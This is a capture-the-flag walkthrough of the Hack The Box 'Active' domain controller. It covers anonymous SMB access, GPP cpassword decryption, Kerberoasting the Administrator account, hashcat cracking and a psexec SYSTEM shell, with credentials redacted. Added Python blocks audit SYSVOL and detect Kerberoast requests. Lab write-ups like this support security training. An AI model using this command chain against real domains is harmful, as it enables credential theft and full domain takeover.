Active
IP: 10.10.10.100 | Domain: active.htb
Environment Setup
export IP=10.10.10.100
export VPN=$(ip a show tun0 | grep "inet " | awk '{print $2}' | cut -d/ -f1)
echo "10.10.10.100 active.htb" >> /etc/hosts
Step 1 — Port Scanning
Why: Map the attack surface. On a Windows box, seeing Kerberos (88), LDAP, and SMB together immediately confirms a Domain Controller. OS fingerprinting on older builds is important — legacy deployments are far more likely to have Group Policy misconfigurations.
nmap -sCV -p- --min-rate 5000 $IP -oN scans/nmap_active.out
Output:
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
9389/tcp open adws
47001/tcp open winrm
Key findings:
- Confirmed Domain Controller — Kerberos (88), LDAP (389/636/3268), DNS (53), kpasswd (464)
- OS: Windows Server 2008 R2 Build 7601 — legacy, high chance of GPP credentials in SYSVOL
- SMB (139/445) open — check for anonymous/null session share access
- No HTTP — attack surface is purely AD/SMB
Step 2 — SMB Share Enumeration
Why: SMB shares on Domain Controllers often expose sensitive Group Policy files. Older AD environments frequently have null sessions or anonymous read access to shares that replicate SYSVOL — which can contain GPP credential files.
nxc smb $IP -u '' -p '' --shares
Output:
Share Permissions Remark
----- ----------- ------
ADMIN$ Remote Admin
C$ Default share
IPC$ Remote IPC
NETLOGON Logon server share
Replication READ ← anonymous read
SYSVOL Logon server share
Users
Key findings:
- Replication share is readable anonymously — this is a mirror of SYSVOL
- SYSVOL replication distributes Group Policy files to all DCs, including any GPP XML files
- Users share not accessible — needs creds
Step 3 — GPP Password Discovery
Why: Group Policy Preferences (GPP) allowed admins to embed credentials in XML files deployed via SYSVOL. Microsoft accidentally published the AES-256 encryption key in their MSDN documentation (MS14-025 / CVE-2014-1812). The patch only stops new passwords from being stored: any Groups.xml already written to SYSVOL stays there until someone removes it.
smbclient //$IP/Replication -N -c 'recurse ON; prompt OFF; mget *'
# Groups.xml found at:
# \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
Output:
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="..." name="active.htb\SVC_TGS" ...>
    <Properties
      cpassword="<REDACTED>"
      userName="active.htb\SVC_TGS"
      acctDisabled="0" neverExpires="1" noChange="1"/>
  </User>
</Groups>
Key findings:
- cpassword field found — AES-256 encrypted with Microsoft's published static key
- Account: active.htb\SVC_TGS — service account, almost certainly Kerberoastable
- Decryption requires no cracking — key is public
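A defender-side check for the condition found above, added here and not part of the original writeup: walk an offline copy of SYSVOL and report every GPP preference file that still carries a non-empty cpassword, without decrypting anything. The sample XML, the ScheduledTasks entry and the temp-directory layout are constructed for the demo; only the Groups clsid and the GPO GUID come from the page.

```python
# Added example (not the writeup's own code): audit an offline copy of SYSVOL for GPP XML files that still carry a cpassword.
import os
import tempfile
import xml.etree.ElementTree as ET

# Preference files that could embed credentials before MS14-025.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

def find_cpasswords(sysvol_root):
    """Return one finding per element whose <Properties> has a non-empty cpassword."""
    findings = []
    for dirpath, _, files in os.walk(sysvol_root):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue  # malformed file: skip it rather than abort the whole audit
            for elem in root.iter():
                props = elem.find("Properties")
                if props is not None and props.get("cpassword"):
                    findings.append({"file": os.path.relpath(path, sysvol_root),
                                     "element": elem.tag,
                                     "account": props.get("userName", props.get("accountName", "?"))})
    return findings

# Constructed samples: one live cpassword (as on Active) and one already blanked out.
SAMPLE_GROUPS_XML = """<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User name="active.htb\\SVC_TGS">
    <Properties action="U" cpassword="CONSTRUCTED_CPASSWORD" userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>"""
SAMPLE_TASKS_XML = """<ScheduledTasks><Task name="backup">
  <Properties cpassword="" runAs="active.htb\\backup"/></Task></ScheduledTasks>"""

def demo():
    """Lay the samples out like a real SYSVOL tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        prefs = os.path.join(tmp, "active.htb", "Policies",
                             "{31B2F340-016D-11D2-945F-00C04FB984F9}", "MACHINE", "Preferences")
        for sub, xml_text in (("Groups", SAMPLE_GROUPS_XML), ("ScheduledTasks", SAMPLE_TASKS_XML)):
            os.makedirs(os.path.join(prefs, sub))
            with open(os.path.join(prefs, sub, sub + ".xml"), "w") as f:
                f.write(xml_text)
        return find_cpasswords(tmp)
```

Point find_cpasswords at a mounted or copied SYSVOL root to run it against a real domain; an empty cpassword (the state after the credential has been cleared) is deliberately not reported.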
Step 4 — GPP Decrypt
Why: gpp-decrypt uses the Microsoft-published AES key to instantly reverse the cpassword value. No wordlist, no GPU — deterministic decryption.
gpp-decrypt "<REDACTED_CPASSWORD>"
Output:
<REDACTED>
Key findings:
- Plaintext credential recovered: SVC_TGS:<REDACTED>
- One-liner, zero effort — GPP is a gift that keeps giving on legacy environments
- Next: check if SVC_TGS has a registered SPN → Kerberoast
Step 5 — Kerberoasting
Why: Any authenticated domain user can request a TGS for any SPN. The TGS is encrypted with a key derived from the service account's password (its NTLM hash under RC4-HMAC), which makes it offline-crackable with hashcat. SVC_TGS is named after the Kerberos component it was likely associated with, so an SPN is expected. Administrator itself being Kerberoastable here is unusual but classic on legacy deployments.
impacket-GetUserSPNs active.htb/SVC_TGS:<REDACTED> -dc-ip $IP -request
Output:
ServicePrincipalName Name MemberOf PasswordLastSet
-------------------- ------------- -------- ---------------
active/CIFS:445 Administrator 2018-07-18
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS:445*$<REDACTED_HASH>
Key findings:
- Administrator account is Kerberoastable — SPN: active/CIFS:445
- Hash type: $krb5tgs$23$ (RC4-HMAC) — fast to crack, hashcat mode 13100
- Built-in Administrator with an SPN is an instant game-over misconfiguration
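Detection logic for the request pattern described above, added as an example and not part of the original writeup: parse constructed Windows Security 4769 events (written as key=value text rather than real EVTX) and flag RC4 (0x17) TGS requests for user accounts, raising a high-severity alert when the target is the built-in Administrator and a medium one when one requester sweeps several SPNs. The sample events, client IPs and the jdoe/svc_* names are made up; SVC_TGS and Administrator are the accounts from the page.

```python
# Added example (not the writeup's own code): flag Kerberoast-style TGS requests in constructed 4769 events.
import re
from collections import defaultdict

RC4_HMAC = "0x17"               # TicketEncryptionType for RC4-HMAC, i.e. $krb5tgs$23$
PRIVILEGED = {"administrator"}  # accounts that should never carry an SPN at all

def parse_4769(line):
    """Split a 'key=value key=value' event line into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def is_roastable_request(ev):
    """True for successful RC4 TGS requests to a user account (not machine/krbtgt)."""
    svc = ev.get("ServiceName", "")
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    return ev.get("EventID") == "4769" and ev.get("Status") == "0x0" and ev.get("TicketEncryptionType") == RC4_HMAC

def detect_kerberoast(lines, threshold=3):
    """Alert on RC4 tickets for privileged accounts, or many distinct SPNs per requester."""
    per_requester = defaultdict(set)
    alerts = []
    for line in lines:
        ev = parse_4769(line)
        if not is_roastable_request(ev):
            continue
        who = (ev.get("TargetUserName", "?"), ev.get("IpAddress", "?"))
        svc = ev["ServiceName"]
        per_requester[who].add(svc)
        if svc.lower() in PRIVILEGED:
            alerts.append({"severity": "high", "requester": who[0], "ip": who[1], "reason": f"RC4 TGS requested for privileged account {svc}"})
    for who, services in per_requester.items():
        if len(services) >= threshold:
            alerts.append({"severity": "medium", "requester": who[0], "ip": who[1], "reason": f"RC4 TGS for {len(services)} distinct service accounts"})
    return alerts

# Constructed events: DC$ requests are normal AES traffic, the RC4 request for
# Administrator mirrors the GetUserSPNs run above, and jdoe sweeps three SPNs.
SAMPLE_4769 = [
    "EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 IpAddress=10.10.14.5 Status=0x0",
    "EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 IpAddress=10.10.14.5 Status=0x0",
    "EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=10.10.14.5 Status=0x0",
    "EventID=4769 TargetUserName=jdoe@ACTIVE.HTB ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.10.10.20 Status=0x0",
    "EventID=4769 TargetUserName=jdoe@ACTIVE.HTB ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.10.10.20 Status=0x0",
    "EventID=4769 TargetUserName=jdoe@ACTIVE.HTB ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=10.10.10.20 Status=0x0",
]

def demo():
    return detect_kerberoast(SAMPLE_4769)
```

On a domain that still allows RC4 for legitimate clients the threshold branch carries the signal; the privileged-account branch fires on a single event because the fix is the same either way: remove the SPN from Administrator.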
Step 6 — Hash Cracking
Why: RC4-HMAC TGS-REP hashes (type 23) are among the fastest Kerberos hash types to crack. The password follows a common dictionary + year pattern — rockyou.txt hits it immediately.
hashcat -m 13100 administrator.hash /usr/share/wordlists/rockyou.txt
Output:
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS:445*$<REDACTED_HASH>:<REDACTED>
Key findings:
- Password cracked: Administrator:<REDACTED>
- Rockyou hit — dictionary word + year combination, cracked in seconds
Step 7 — Domain Admin
Why: With the built-in Administrator's plaintext password we have full domain control. PSExec via SMB gives a SYSTEM shell directly on the DC.
impacket-psexec active.htb/Administrator:<REDACTED>@$IP
Output:
C:\Windows\system32> whoami
nt authority\system
hostname: DC
🏴 MACHINE PWNED — DOMAIN ADMIN ACHIEVED
Credentials
SVC_TGS:<REDACTED>
Administrator:<REDACTED>
Full Attack Chain
Anonymous SMB → Replication share (READ)
└─ Groups.xml in SYSVOL → cpassword (GPP / MS14-025)
└─ gpp-decrypt → SVC_TGS:<REDACTED>
└─ Kerberoast → Administrator TGS (SPN: active/CIFS:445)
└─ hashcat (rockyou) → <REDACTED>
└─ PSExec → SYSTEM on DC
🏴 DOMAIN ADMIN
© 0xNRG — Active pwned